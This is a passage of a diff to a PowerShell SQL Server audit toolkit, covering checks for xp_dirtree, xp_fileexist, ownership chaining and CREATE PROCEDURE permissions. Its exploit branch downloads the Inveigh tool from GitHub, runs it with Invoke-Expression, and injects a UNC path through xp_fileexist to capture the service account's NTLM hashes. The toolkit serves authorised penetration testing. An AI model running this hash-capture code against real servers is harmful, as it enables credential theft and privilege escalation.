Privilege - xp_dirtree" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_fileexist" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -10161,7 +21214,7 @@ Function Invoke-SQLAuditPrivXpDirtree { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_dirtree." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist." Return } else @@ -10193,9 +21246,9 @@ Function Invoke-SQLAuditPrivXpDirtree { $TestMode = 'Audit' } - $Vulnerability = 'Excessive Privilege - Execute xp_dirtree' - $Description = 'xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.' - $Remediation = 'Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public' + $Vulnerability = 'Excessive Privilege - Execute xp_fileexist' + $Description = 'xp_fileexist is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.' + $Remediation = 'Remove EXECUTE privileges on the xp_fileexist procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_fileexist to Public' $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' @@ -10210,28 +21263,28 @@ Function Invoke-SQLAuditPrivXpDirtree # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- - # Get users and roles that execute xp_dirtree + # Get users and roles that execute xp_fileexist $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript { - $_.ObjectName -eq 'xp_dirtree' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant' + $_.ObjectName -eq 'xp_fileexist' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant' } # Update vulnerable status if($DirTreePrivs) { # Status user - Write-Verbose -Message "$Instance : - The $PrincipalName principal has EXECUTE privileges on xp_dirtree." + Write-Verbose -Message "$Instance : - The $PrincipalName principal has EXECUTE privileges on xp_fileexist." $IsVulnerable = 'Yes' $DirTreePrivs | - ForEach-Object -Process { + ForEach-Object { $PrincipalName = $DirTreePrivs.PrincipalName # Check if current login can exploit $CurrentPrincpalList | - ForEach-Object -Process { + ForEach-Object { $PrincipalCheck = $_ - if($PrincipalName -eq $PrincipalCheck -or $PrincipalName -eq 'public') + if($PrincipalName -eq $PrincipalCheck) { $IsExploitable = 'Yes' @@ -10252,35 +21305,35 @@ Function Invoke-SQLAuditPrivXpDirtree $IAMADMIN = 'Yes' } + # Get IP of current system + if(-not $AttackerIp) + { + $AttackerIp = (Test-Connection -ComputerName 127.0.0.1 -Count 1 | + Select-Object -ExpandProperty Ipv4Address | + Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString) + + if($AttackerIp -eq '127.0.0.1') + { + $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter "ipenabled = 'True'" -ComputerName $env:COMPUTERNAME | + Select-Object -First 1 -Property @{ + Name = 'IPAddress' + Expression = { + [regex]$rx = '(\d{1,3}(\.?)){4}'; $rx.matches($_.IPAddress)[0].Value + } + } | + Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1 + } + } + # Check for exploit flag if($IAMADMIN -eq 'Yes') { # Attempt to load Inveigh from file - #$InveighSrc = Get-Content .\scripts\Inveigh.ps1 -ErrorAction SilentlyContinue | Out-Null + #$InveighSrc = Get-Content .\scripts\Inveigh.ps1 -ErrorAction SilentlyContinue #Invoke-Expression($InveighSrc) - # Get IP of current system - if(-not $AttackerIp) - { - $AttackerIp = (Test-Connection -ComputerName 127.0.0.1 -Count 1 | - Select-Object -ExpandProperty Ipv4Address | - Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString) - - if($AttackerIp -eq '127.0.0.1') - { - $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter "ipenabled = 'True'" -ComputerName $env:COMPUTERNAME | - Select-Object -First 1 -Property @{ - Name = 'IPAddress' - Expression = { - [regex]$rx = '(\d{1,3}(\.?)){4}'; $rx.matches($_.IPAddress)[0].Value - } - } | - Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1 - } - } - # Attempt to load Inveigh via reflection - Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1') + Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1') $TestIt = Test-Path -Path Function:\Invoke-Inveigh if($TestIt -eq 'True') @@ -10288,99 +21341,332 @@ Function Invoke-SQLAuditPrivXpDirtree Write-Verbose -Message "$Instance : - Inveigh loaded." # Get IP of SQL Server instance - $InstanceIP = Resolve-DnsName $ComputerName | Select-Object -Property IPaddress -ExpandProperty ipaddress + $InstanceIP = [System.Net.Dns]::GetHostAddresses($ComputerName) # Start sniffing for hashes from that IP Write-Verbose -Message "$Instance : - Start sniffing..." $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp + # Randomized 5 character file name + $path = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) + + # Sent unc path to attacker's Ip + Write-Verbose -Message "$Instance : - Inject UNC path to \\$AttackerIp\$path..." + $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "xp_fileexist '\\$AttackerIp\$path'" -TimeOut 10 -SuppressVerbose + + # Sleep for $Timeout seconds to ensure that slow connections make it back to the listener + Write-Verbose -Message "$Instance : - Sleeping for $TimeOut seconds to ensure the hash comes back" + Start-Sleep -s $TimeOut + + # Stop sniffing and print password hashes + $null = Stop-Inveigh + Write-Verbose -Message "$Instance : - Stopped sniffing." + + $HashType = '' + $Hash = '' + + [string]$PassCleartext = Get-Inveigh -Cleartext + if($PassCleartext) + { + $HashType = 'Cleartext' + $Hash = $PassCleartext + } + + [string]$PassNetNTLMv1 = Get-Inveigh -NTLMv1 + if($PassNetNTLMv1) + { + $HashType = 'NetNTLMv1' + $Hash = $PassNetNTLMv1 + } + + [string]$PassNetNTLMv2 = Get-Inveigh -NTLMv2 + if($PassNetNTLMv2) + { + $HashType = 'NetNTLMv2' + $Hash = $PassNetNTLMv2 + } + + if($Hash) + { + # Update Status + Write-Verbose -Message "$Instance : - Recovered $HashType hash:" + Write-Verbose -Message "$Instance : - $Hash" + $Exploited = 'Yes' + $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash" + } + else + { + # Update Status + $Exploited = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. xp_fileexist Executed, but no password hash was recovered." + } + + # Clear inveigh cache + $null = Clear-Inveigh + } + else + { + Write-Verbose -Message "$Instance : - Inveigh could not be loaded." + # Update status + $Exploited = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered." + } + } + else + { + # Update status + $Exploited = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database." + } + } + else + { + # Update status + $IsExploitable = 'No' + $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database." + } + } + + # Add record + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } + }else{ + Write-Verbose -Message "$Instance : - No logins were found with the EXECUTE privilege on xp_fileexist." + } + } + + End + { + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist" + + # Return data + if ( -not $NoOutput) + { + Return $TblData + } + } +} + + +# --------------------------------------- +# Invoke-SQLAuditPrivDbChaining +# --------------------------------------- +# Author: Scott Sutherland +Function Invoke-SQLAuditPrivDbChaining +{ + <# + .SYNOPSIS + Check if data ownership chaining is enabled at the server or databases levels. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER NoDefaults + Don't return information for default databases. + .PARAMETER NoOutput + Don't return output. + .PARAMETER Exploit + Exploit vulnerable issues. + .EXAMPLE + PS C:\> Invoke-SQLAuditPrivDbChaining -Instance SQLServer1\STANDARDDEV2014 + + ComputerName : NETSPI-283-SSU + Instance : NETSPI-283-SSU\STANDARDDEV2014 + Vulnerability : Excessive Privilege - Database Ownership Chaining + Description : Ownership chaining was found enabled at the server or database level. Enabling ownership chaining can lead to unauthorized access to database resources. + Remediation : Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used + enable chaining. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining. + Severity : Low + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : There is not exploit available at this time. + Details : The database testdb was found configured with ownership chaining enabled. + Reference : https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx + Author : Scott Sutherland (@_nullbind), NetSPI 2016 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivDbChaining -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Only select non default databases.')] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't output anything.")] + [switch]$NoOutput, - # Sent unc path to attacker's Ip - Write-Verbose -Message "$Instance : - Inject UNC path to \\$AttackerIp\path..." - $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "xp_dirtree '\\$AttackerIp\path'" -TimeOut 10 -SuppressVerbose + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit + ) - # Stop sniffing and print password hashes - Start-Sleep $TimeOut - $null = Stop-Inveigh - Write-Verbose -Message "$Instance : - Stopped sniffing." + Begin + { + # Table for output + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Vulnerability') + $null = $TblData.Columns.Add('Description') + $null = $TblData.Columns.Add('Remediation') + $null = $TblData.Columns.Add('Severity') + $null = $TblData.Columns.Add('IsVulnerable') + $null = $TblData.Columns.Add('IsExploitable') + $null = $TblData.Columns.Add('Exploited') + $null = $TblData.Columns.Add('ExploitCmd') + $null = $TblData.Columns.Add('Details') + $null = $TblData.Columns.Add('Reference') + $null = $TblData.Columns.Add('Author') + } - $HashType = '' - $Hash = '' + Process + { + # Status User + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining" - [string]$PassCleartext = Get-InveighCleartext - if($PassCleartext) - { - $HashType = 'Cleartext' - $Hash = $PassCleartext - } + # Test connection to server + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if(-not $TestConnection) + { + # Status user + Write-Verbose -Message "$Instance : CONNECTION FAILED." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining." + Return + } + else + { + Write-Verbose -Message "$Instance : CONNECTION SUCCESS." + } - [string]$PassNetNTLMv1 = Get-InveighNTLMv1 - if($PassNetNTLMv1) - { - $HashType = 'NetNTLMv1' - $Hash = $PassNetNTLMv1 - } + # Grab server information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName - [string]$PassNetNTLMv2 = Get-InveighNTLMv2 - if($PassNetNTLMv2) - { - $HashType = 'NetNTLMv2' - $Hash = $PassNetNTLMv2 - } + # -------------------------------------------- + # Set function meta data for report output + # -------------------------------------------- + if($Exploit) + { + $TestMode = 'Exploit' + } + else + { + $TestMode = 'Audit' + } + $Vulnerability = 'Excessive Privilege - Database Ownership Chaining' + $Description = 'Ownership chaining was found enabled at the server or database level. Enabling ownership chaining can lead to unauthorized access to database resources.' + $Remediation = "Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used enable chaining. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining." + $Severity = 'Low' + $IsVulnerable = 'No' + $IsExploitable = 'No' + $Exploited = 'No' + $ExploitCmd = 'There is not exploit available at this time.' + $Details = '' + $Reference = 'https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx ' + $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' - if($Hash) - { - # Update Status - Write-Verbose -Message "$Instance : - Recovered $HashType hash:" - Write-Verbose -Message "$Instance : - $Hash" - $Exploited = 'Yes' + # ----------------------------------------------------------------- + # Check for the Vulnerability + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- - $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash" - } - else - { - # Update Status - $Exploited = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. xp_dirtree Executed, but no password hash was recovered." - } + # Select links configured with static credentials - # Clear inveigh cache - $null = Clear-Inveigh - } - else - { - Write-Verbose -Message "$Instance : - Inveigh could not be loaded." - # Update status - $Exploited = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered." - } - } - else - { - # Update status - $Exploited = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database." - } - } - else - { - # Update status - $IsExploitable = 'No' - $Details = "The $PrincipalName principal has EXECUTE privileges the xp_dirtree procedure in the master database." - } - } + if($NoDefaults) + { + $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -NoDefaults -SuppressVerbose | Where-Object -FilterScript { + $_.is_db_chaining_on -eq 'True' + } + } + else + { + $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.is_db_chaining_on -eq 'True' + } + } - # Add record - $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + # Update vulnerable status + if($ChainDatabases) + { + $IsVulnerable = 'Yes' + $ChainDatabases | + ForEach-Object -Process { + $DatabaseName = $_.DatabaseName + if($DatabaseName -ne 'master' -and $DatabaseName -ne 'tempdb' -and $DatabaseName -ne 'msdb') + { + Write-Verbose -Message "$Instance : - The database $DatabaseName has ownership chaining enabled." + $Details = "The database $DatabaseName was found configured with ownership chaining enabled." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + } } } else { - Write-Verbose -Message "$Instance : - No logins were found with the EXECUTE privilege on xp_dirtree." + Write-Verbose -Message "$Instance : - No non-default databases were found with ownership chaining enabled." + } + + # Check for server wide setting + $ServerCheck = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Name -like '*chain*' -and $_.config_value -eq 1 + } + if($ServerCheck) + { + $IsVulnerable = 'Yes' + Write-Verbose -Message "$Instance : - The server configuration 'cross db ownership chaining' is set to 1. This can affect all databases." + $Details = "The server configuration 'cross db ownership chaining' is set to 1. This can affect all databases." + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- + # $IsExploitable = "No" or $IsExploitable = "Yes" + # Check if the link is alive and verify connection + check if sysadmin + + + # ----------------------------------------------------------------- + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role + # ----------------------------------------------------------------- + # $Exploited = "No" or $Exploited = "Yes" + # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') + # Also, recommend link crawler module + + # Status User - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - XP_DIRTREE" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining" } End @@ -10393,17 +21679,16 @@ Function Invoke-SQLAuditPrivXpDirtree } } + # --------------------------------------- -# Invoke-SQLAuditPrivXpFileexist +# Invoke-SQLAuditPrivCreateProcedure # --------------------------------------- # Author: Scott Sutherland -Function Invoke-SQLAuditPrivXpFileexist +Function Invoke-SQLAuditPrivCreateProcedure { <# .SYNOPSIS - Check if the current user has privileges to execute xp_fileexist extended stored procedure. - If exploit option is used, the script will inject a UNC path to the attacker's IP and capture - the SQL Server service account password hash using Inveigh. + Check if the current login has the CREATE PROCEDURE permission. Attempt to leverage to obtain sysadmin privileges. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -10412,17 +21697,27 @@ Function Invoke-SQLAuditPrivXpFileexist SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER NoOutput + Don't output anything. .PARAMETER Exploit - Exploit vulnerable issues. - .PARAMETER AttackerIp - IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from. - .PARAMETER TimeOut - Number of seconds to wait for authentication from target SQL Server. + Exploit vulnerable issues .EXAMPLE - PS C:\> Invoke-SQLAuditPrivXpFileexist -Verbose -Instance SQLServer1\STANDARDDEV2014 -AttackerIp 10.1.1.2 + PS C:\> Get-SQLInstanceLocal | Invoke-SQLAuditPrivCreateProcedure -Username evil -Password Password123! - .EXAMPLE - PS C:\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpFileexist -Verbose + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + Vulnerability : PERMISSION - CREATE PROCEDURE + Description : The login has privileges to create stored procedures in one or more databases. This may allow the login to escalate privileges within the database. + Remediation : If the permission is not required remove it. Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a + command like: REVOKE CREATE PROCEDURE TO user. + Severity : Medium + IsVulnerable : Yes + IsExploitable : No + Exploited : No + ExploitCmd : No exploit is currently available that will allow evil to become a sysadmin. + Details : The evil principal has the CREATE PROCEDURE permission in the testdb database. + Reference : https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396 + Author : Scott Sutherland (@_nullbind), NetSPI 2016 #> [CmdletBinding()] Param( @@ -10453,15 +21748,7 @@ Function Invoke-SQLAuditPrivXpFileexist [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] - [switch]$Exploit, - - [Parameter(Mandatory = $false, - HelpMessage = 'IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.')] - [string]$AttackerIp, - - [Parameter(Mandatory = $false, - HelpMessage = 'Time in second to way for hash to be captured.')] - [int]$TimeOut = 5 + [switch]$Exploit ) Begin @@ -10486,7 +21773,7 @@ Function Invoke-SQLAuditPrivXpFileexist Process { # Status User - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_fileexist" + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { @@ -10495,25 +21782,25 @@ Function Invoke-SQLAuditPrivXpFileexist if(-not $TestConnection) { # Status user - Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist." + Write-Verbose -Message "$Instance : CONNECTION FAILED" + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - CREATE PROCEDURE" Return } else { - Write-Verbose -Message "$Instance : CONNECTION SUCCESS." + Write-Verbose -Message "$Instance : CONNECTION SUCCESS" } - # Grab server information # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin - $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose + $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' - $CurrentLoginRoles | ForEach-Object -Process { + $CurrentLoginRoles | + ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } @@ -10528,16 +21815,17 @@ Function Invoke-SQLAuditPrivXpFileexist { $TestMode = 'Audit' } - $Vulnerability = 'Excessive Privilege - Execute xp_fileexist' - $Description = 'xp_fileexist is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.' - $Remediation = 'Remove EXECUTE privileges on the xp_fileexist procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_fileexist to Public' + $Vulnerability = 'PERMISSION - CREATE PROCEDURE' + $Description = 'The login has privileges to create stored procedures in one or more databases. This may allow the login to escalate privileges within the database.' + $Remediation = 'If the permission is not required remove it. Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a command like: REVOKE CREATE PROCEDURE TO user' $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' - $ExploitCmd = 'Crack the password hash offline or relay it to another system.' + $ExploitCmd = "No exploit is currently available that will allow $CurrentLogin to become a sysadmin." $Details = '' - $Reference = 'https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/' + $Dependancies = '' + $Reference = 'https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- @@ -10545,243 +21833,186 @@ Function Invoke-SQLAuditPrivXpFileexist # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- - # Get users and roles that execute xp_fileexist - $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript { - $_.ObjectName -eq 'xp_fileexist' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant' - } + # Get all CREATE PROCEDURE grant permissions for all accessible databases + $Permissions = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -SuppressVerbose | Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'CREATE PROCEDURE' - # Update vulnerable status - if($DirTreePrivs) + if($Permissions) { - # Status user - Write-Verbose -Message "$Instance : - The $PrincipalName principal has EXECUTE privileges on xp_fileexist." - - $IsVulnerable = 'Yes' - $DirTreePrivs | + # Iterate through each current login and their associated roles + $CurrentPrincpalList| ForEach-Object -Process { - $PrincipalName = $DirTreePrivs.PrincipalName - - # Check if current login can exploit - $CurrentPrincpalList | + # Check if they have the CREATE PROCEDURE grant + $CurrentPrincipal = $_ + $Permissions | ForEach-Object -Process { - $PrincipalCheck = $_ + $AffectedPrincipal = $_.PrincipalName + $AffectedDatabase = $_.DatabaseName - if($PrincipalName -eq $PrincipalCheck) + if($AffectedPrincipal -eq $CurrentPrincipal) { - $IsExploitable = 'Yes' + # Set flag to vulnerable + $IsVulnerable = 'Yes' + Write-Verbose -Message "$Instance : - The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database." + $Details = "The $AffectedPrincipal principal has the CREATE PROCEDURE permission in the $AffectedDatabase database." - # Check if the current process has elevated privs - # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx - $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() - $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) - $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator - $IsAdmin = $prp.IsInRole($adm) - if (-not $IsAdmin) + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- + $HasAlterSchema = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PermissionName 'ALTER' -PermissionType 'SCHEMA' -PrincipalName $CurrentPrincipal -DatabaseName $AffectedDatabase -SuppressVerbose + if($HasAlterSchema) { - Write-Verbose -Message "$Instance : - You do not have Administrator rights. Run this function as an Administrator in order to load Inveigh." - $IAMADMIN = 'No' + $IsExploitable = 'Yes' + $Dependancies = " $CurrentPrincipal also has ALTER SCHEMA permissions so procedures can be created." + Write-Verbose -Message "$Instance : - Dependancies were met: $CurrentPrincipal has ALTER SCHEMA permissions." + + # Add to report example + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, "$Details$Dependancies", $Reference, $Author) } else { - Write-Verbose -Message "$Instance : - You have Administrator rights. Inveigh will be loaded." - $IAMADMIN = 'Yes' - } - - # Get IP of current system - if(-not $AttackerIp) - { - $AttackerIp = (Test-Connection -ComputerName 127.0.0.1 -Count 1 | - Select-Object -ExpandProperty Ipv4Address | - Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString) + $IsExploitable = 'No' - if($AttackerIp -eq '127.0.0.1') - { - $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter "ipenabled = 'True'" -ComputerName $env:COMPUTERNAME | - Select-Object -First 1 -Property @{ - Name = 'IPAddress' - Expression = { - [regex]$rx = '(\d{1,3}(\.?)){4}'; $rx.matches($_.IPAddress)[0].Value - } - } | - Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1 - } + # Add to report example + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } - # Check for exploit flag - if($IAMADMIN -eq 'Yes') - { - # Attempt to load Inveigh from file - #$InveighSrc = Get-Content .\scripts\Inveigh.ps1 -ErrorAction SilentlyContinue - #Invoke-Expression($InveighSrc) - - # Attempt to load Inveigh via reflection - Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1') - - $TestIt = Test-Path -Path Function:\Invoke-Inveigh - if($TestIt -eq 'True') - { - Write-Verbose -Message "$Instance : - Inveigh loaded." - - # Get IP of SQL Server instance - $InstanceIP = Resolve-DnsName $ComputerName | Select-Object -Property IPaddress -ExpandProperty ipaddress - - # Start sniffing for hashes from that IP - Write-Verbose -Message "$Instance : - Start sniffing..." - $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp - - # Sent unc path to attacker's Ip - Write-Verbose -Message "$Instance : - Inject UNC path to 